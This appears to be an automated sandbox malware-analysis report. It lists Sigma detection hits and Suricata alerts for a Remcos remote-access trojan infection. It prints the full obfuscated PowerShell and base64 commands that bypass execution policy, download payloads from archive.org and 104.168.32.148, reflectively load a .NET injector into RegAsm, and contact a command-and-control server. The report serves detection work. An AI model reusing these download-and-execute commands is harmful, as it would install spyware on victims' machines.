"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1600, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , ProcessId: 2472, ProcessName: wscript.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICA
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1600, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , ProcessId: 2472, ProcessName: wscript.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1600, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline", ProcessId: 1672, ProcessName: csc.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1600, TargetFilename: C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs
Source: Process started | Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1600, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , ProcessId: 2472, ProcessName: wscript.exe
Source: File created | Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1600, TargetFilename: C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))", CommandLine: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd

                      Data Obfuscation

Source: Process started | Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1600, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline", ProcessId: 1672, ProcessName: csc.exe

                      Stealing of Sensitive Information

Source: File created | Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 6020, TargetFilename: C:\ProgramData\remcos\logs.dat
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T18:50:19.290790+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 104.168.32.148 | 80 | 192.168.2.5 | 49708 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T18:50:19.290790+0200 | 2020425 | 1 | Exploit Kit Activity Detected | 104.168.32.148 | 80 | 192.168.2.5 | 49708 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T18:49:56.463614+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:50:41.546804+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49711 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:51:03.935894+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49713 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:51:26.329688+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49715 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:51:48.885817+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49716 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:52:11.300191+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49717 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:52:33.741698+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49718 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:52:56.235749+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49719 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:53:18.658908+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49720 | 45.134.140.70 | 50312 | TCP
2024-09-25T18:53:41.236809+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49721 | 45.134.140.70 | 50312 | TCP
